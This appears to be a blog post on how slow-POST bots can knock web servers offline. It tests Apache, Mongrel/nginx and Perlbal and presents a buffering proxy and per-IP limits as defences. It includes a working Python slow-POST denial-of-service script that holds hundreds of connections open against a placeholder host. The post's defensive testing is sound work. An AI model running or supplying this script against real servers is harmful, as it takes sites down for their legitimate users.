How other people can kill your web server: no fun and little profit :(
Phillip Pearson, Second p0st (http://www.myelin.co.nz/post/rss.xml)
This is probably old news to anyone who's run anything spammable on the web for long enough, but there are bots out there that don't do HTTP particularly well. I had this problem with the Topic Exchange years ago and it just recently hit a couple of BBM's sites. It's now fixed (for some definition of "fixed") in both cases with a Python proxy I wrote to buffer uploads and responses.
Curious whether other "standard solutions" out there handle this situation, and also wanting to test my proxy, I wrote a script that opens many HTTP connections to a site, sends POST headers with a large Content-Length, then trickles a byte into each connection every now and then so they don't time out, but never actually finishes the POST.
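The script itself isn't included here, but the idea is simple enough to sketch in Python. The target host, connection count, Content-Length and trickle interval below are all made-up illustration values, not anything from my actual script:

# Minimal sketch of the slow-POST tester described above. The constants are
# illustrative assumptions, not real values.
import socket
import time

TARGET_HOST = "target.example.com"
TARGET_PORT = 80
NUM_CONNECTIONS = 500
TRICKLE_INTERVAL = 10  # seconds between one-byte writes

def open_slow_post(host, port):
    # Open a connection and send POST headers that promise a huge body,
    # then return the socket without ever sending that body.
    s = socket.create_connection((host, port))
    s.sendall(b"POST / HTTP/1.1\r\n"
              b"Host: " + host.encode() + b"\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n"
              b"Content-Length: 1000000000\r\n"
              b"\r\n")
    return s

conns = [open_slow_post(TARGET_HOST, TARGET_PORT) for _ in range(NUM_CONNECTIONS)]

while True:
    time.sleep(TRICKLE_INTERVAL)
    for s in conns:
        try:
            s.sendall(b"x")  # a byte now and then so the server doesn't time us out
        except OSError:
            pass  # server dropped this connection; leave it dead

Each held connection costs the client almost nothing, which is why the script scales to thousands of connections so easily.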
It took down my development box within seconds, driving it so badly out of memory that the Linux OOM killer kicked in and tore the thing to shreds. Reducing MaxClients in the Apache config improved the situation to the point where the machine would stay up, but the script would still make the site inaccessible (and fill up the accept queue, so nobody would be able to get in even if a request ever did get fully posted). Apache stops accepting requests when it runs out of children, so after a while the script's connections just started getting rejected. Killing the script (and closing all the sockets) made the site instantly accessible again.
Trying it out with my proxy in front, I ran it for a few minutes but killed it after it established > 10k HTTP connections without affecting the site. My proxy's not particularly clever so you could cause the machine to run out of swap by feeding it gigabytes of data, but it seems fine with lots of connections, at least.
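The proxy isn't published here either, but the buffering idea is roughly the following. This is a thread-per-connection sketch for readability rather than the real thing; the backend address and listen port are assumptions, and keep-alive and chunked bodies are ignored:

# Rough sketch of a buffering front end: read the whole request from the
# (possibly very slow) client before touching the backend, so a trickling
# uploader only ties up this cheap handler, not a backend worker.
import socket
import socketserver

BACKEND_HOST, BACKEND_PORT = "127.0.0.1", 8080  # assumed backend location
LISTEN_PORT = 8000

class Handler(socketserver.BaseRequestHandler):
    def handle(self):
        data = b""
        while b"\r\n\r\n" not in data:          # buffer the request headers
            chunk = self.request.recv(65536)
            if not chunk:
                return
            data += chunk
        headers, _, body = data.partition(b"\r\n\r\n")
        length = 0
        for line in headers.split(b"\r\n"):
            if line.lower().startswith(b"content-length:"):
                length = int(line.split(b":", 1)[1].strip().decode())
        while len(body) < length:               # buffer the whole body too
            chunk = self.request.recv(65536)
            if not chunk:
                return
            body += chunk
        # Only now open a backend connection, then relay the response back.
        with socket.create_connection((BACKEND_HOST, BACKEND_PORT)) as backend:
            backend.sendall(headers + b"\r\n\r\n" + body)
            while True:
                chunk = backend.recv(65536)
                if not chunk:
                    break
                self.request.sendall(chunk)

class Proxy(socketserver.ThreadingTCPServer):
    daemon_threads = True
    allow_reuse_address = True

if __name__ == "__main__":
    Proxy(("", LISTEN_PORT), Handler).serve_forever()

Buffering the whole upload in memory before touching the backend is exactly why, as noted above, feeding it gigabytes of data could still exhaust swap.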
Testing the script against a Rails site running on a Mongrel cluster behind nginx gave similar results: no memory exhaustion (no child processes are spawned with Mongrel/nginx) but an inaccessible site. Interestingly, the site didn't come back for a few minutes after I killed the script; nginx or Mongrel took a while to process all the disconnects, or something.
One bit of software I thought would be able to take a beating without batting an eyelash is Perlbal. And it did... to a point. It seems to use quite a lot of memory per connection, and after 500 connections (at which point it was using something like 3G of virtual memory) it printed "Out of memory!" and died. This is kind of scary, as Perlbal doesn't respawn itself (at least with the provided debian/perlbal.init script). So if you're running Perlbal you might want to run it under something like supervise or monit, or just in a simple shell script like this:
#!/bin/sh
# Crude respawn loop: retry the perlbal start every second, so a new daemon
# comes up shortly after the old one dies.
while true; do
    /usr/local/bin/perlbal --daemon
    sleep 1
done
(I'll ping the Perlbal dev list in a minute, as I'm sure it would be possible to get it to stop accept()ing in low memory situations, or perhaps have it limit the number of simultaneous connections per IP.)
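For the second of those ideas, a per-IP cap is essentially just a counter keyed by client address. This isn't Perlbal code, just a Python sketch of the shape such a limit might take (MAX_PER_IP is an arbitrary number):

# Sketch of per-IP connection limiting for a front-end proxy (illustration
# only; hook names and the limit are assumptions).
import collections

MAX_PER_IP = 20                  # arbitrary budget per client address
active = collections.Counter()   # currently-open connections per IP

def on_accept(conn, client_ip):
    # Called when the proxy accepts a connection; refuse it if this client
    # already holds too many.
    if active[client_ip] >= MAX_PER_IP:
        conn.close()
        return False
    active[client_ip] += 1
    return True

def on_close(client_ip):
    active[client_ip] -= 1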
If anyone has a service running behind a different proxy/balancer that they wouldn't mind me running the script against, please drop me a line. Or for that matter if anyone has a web service that they're concerned is easily taken down, let me know... I'd be interested to see how resilient other proxies and web servers are.